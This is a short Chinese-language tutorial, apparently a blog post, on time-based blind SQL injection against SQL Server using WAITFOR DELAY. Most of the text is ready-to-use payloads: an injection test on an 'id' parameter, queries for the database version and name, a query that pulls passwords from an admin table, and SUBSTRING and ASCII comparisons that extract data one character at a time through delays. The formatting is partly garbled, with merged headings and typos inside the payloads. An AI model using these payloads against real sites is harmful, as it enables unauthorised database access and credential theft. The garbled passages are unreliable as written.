简介
WAITFOR 是SOLServer 中Transact-SQL提供的一个流程控制语句。它的作用就是等待特定时间,然后继续执行后续的语句。它包含一个参数DELAY,用来指定等待的时间。waitfor delay ‘0:0:5’ 等待5秒执行操作,页面将5秒之返回
select 1 waitfor delay ‘0:0:5’
判断注入
?id=1 waitfor delay ‘0:0:5’ — -页面延时5秒返回 SUBSTRING 截取字符串### 查询信息 数据库版本(select @@version) 数据库名(select db_name()) 获取密码(select password from admin)### 截取字符判断法 DB_NAME() mydbSUBSTRING 从第一位开始取一位select SUBSTRING (DB_NAME (), 1, 1)if m=mselect from art where id=1 if (SUBSTRING(DB_NAME (), 1, 1)=CHAR(109)) waitfor delay ‘0:0:5’ — -select from art where id=1 if (SUBSTRING (DB_NAME O, 1, 1)=’m’) waitfor delay ‘0:0:5’ — -### ascii码半截法 把字符转成ascii码select * from art where id=1 IF ASCII (SUBSTRING (DB_NAME (), 1, 1))>30 WAITFOR DELAY ‘0:0:5’ — -
若有收获,就点个赞吧
0 人点赞
